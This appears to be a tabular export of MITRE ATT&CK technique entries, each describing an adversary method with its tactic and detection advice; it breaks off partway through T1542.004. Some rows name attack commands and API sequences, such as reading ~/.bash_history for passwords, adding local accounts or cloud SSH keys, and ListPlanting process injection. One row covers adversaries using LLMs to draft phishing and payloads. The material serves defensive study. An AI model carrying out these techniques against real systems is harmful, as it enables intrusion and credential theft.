T1203 | Exploitation for Client Execution | Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents. | 18 April 2018 | enterprise-attack | Execution | Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. |
T1596 | Search Open Technical Databases | Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). | 02 October 2020 | enterprise-attack | Reconnaissance | Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
T1499 | Endpoint Denial of Service | Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
| 18 April 2019 | enterprise-attack | Impact | Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS. |
T1137.005 | Office Application Startup: Outlook Rules | Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules) | 07 November 2019 | enterprise-attack | Persistence | Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. |
T1218 | System Binary Proxy Execution | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) | 18 April 2018 | enterprise-attack | Defense Evasion | Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity. |
T1552.003 | Unsecured Credentials: Bash History | Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) | 04 February 2020 | enterprise-attack | Credential Access | Monitoring when the user's <code>.bash_history</code> is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like <code>cat ~/.bash_history</code>. |
T1136.001 | Create Account: Local Account | Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. | 28 January 2020 | enterprise-attack | Persistence | Monitor for processes and command-line parameters associated with local account creation, such as <code>net user /add</code> , <code>useradd</code> , and <code>dscl -create</code> . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations. |
T1046 | Network Service Discovery | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) | 31 May 2017 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans. |
T1547.013 | Boot or Logon Autostart Execution: XDG Autostart Entries | Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)
Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.
Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022) | 10 September 2019 | enterprise-attack | Persistence, Privilege Escalation | Malicious XDG autostart entries may be detected by auditing file creation and modification events within the <code>/etc/xdg/autostart</code> and <code>~/.config/autostart</code> directories. Depending on individual configurations, defenders may need to query the environment variables <code>$XDG_CONFIG_HOME</code> or <code>$XDG_CONFIG_DIRS</code> to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user. |
T1612 | Build Image on Host | Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. | 30 March 2021 | enterprise-attack | Defense Evasion | Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code. |
T1621 | Multi-Factor Authentication Request Generation | Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe) | 01 April 2022 | enterprise-attack | Credential Access | Monitor user account logs as well as 2FA/MFA application logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism. |
T1036.001 | Masquerading: Invalid Code Signature | Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature. | 10 February 2020 | enterprise-attack | Defense Evasion | Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers. |
T1125 | Video Capture | An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review) | 31 May 2017 | enterprise-attack | Collection | Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. |
T1071.003 | Application Layer Protocol: Mail Protocols | Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28) | 15 March 2020 | enterprise-attack | Command and Control | Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2) |
T1497.001 | Virtualization/Sandbox Evasion: System Checks | Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018) | 06 March 2020 | enterprise-attack | Defense Evasion, Discovery | Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. |
T1071.001 | Application Layer Protocol: Web Protocols | Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. | 15 March 2020 | enterprise-attack | Command and Control | Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for web traffic to/from known-bad or suspicious domains. |
T1098.001 | Account Manipulation: Additional Cloud Credentials | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence) | 19 January 2020 | enterprise-attack | Persistence, Privilege Escalation | Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. |
T1556.001 | Modify Authentication Process: Domain Controller Authentication | Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton) | 11 February 2020 | enterprise-attack | Credential Access, Defense Evasion, Persistence | Monitor for calls to <code>OpenProcess</code> that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). |
T1588.007 | Obtain Capabilities: Artificial Intelligence | Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
| 11 March 2024 | enterprise-attack | Resource Development | null |
T1585 | Establish Accounts | Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
| 01 October 2020 | enterprise-attack | Resource Development | Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). |
T1055.015 | Process Injection: ListPlanting | Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback. | 22 November 2021 | enterprise-attack | Defense Evasion, Privilege Escalation | Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as <code>FindWindow</code>, <code>FindWindowEx</code>, <code>EnumWindows</code>, <code>EnumChildWindows</code>, and those that can be used to modify memory within another process, such as <code>VirtualAllocEx</code>/<code>WriteProcessMemory</code>, may be abused for this technique.
Consider monitoring for excessive use of <code>SendMessage</code> and/or <code>PostMessage</code> API functions with <code>LVM_SETITEMPOSITION</code> and/or <code>LVM_GETITEMPOSITION</code> arguments.
Analyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
T1518 | Software Discovery | Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). | 16 September 2019 | enterprise-attack | Discovery | System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
T1542.004 | Pre-OS Boot: ROMMONkit | Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
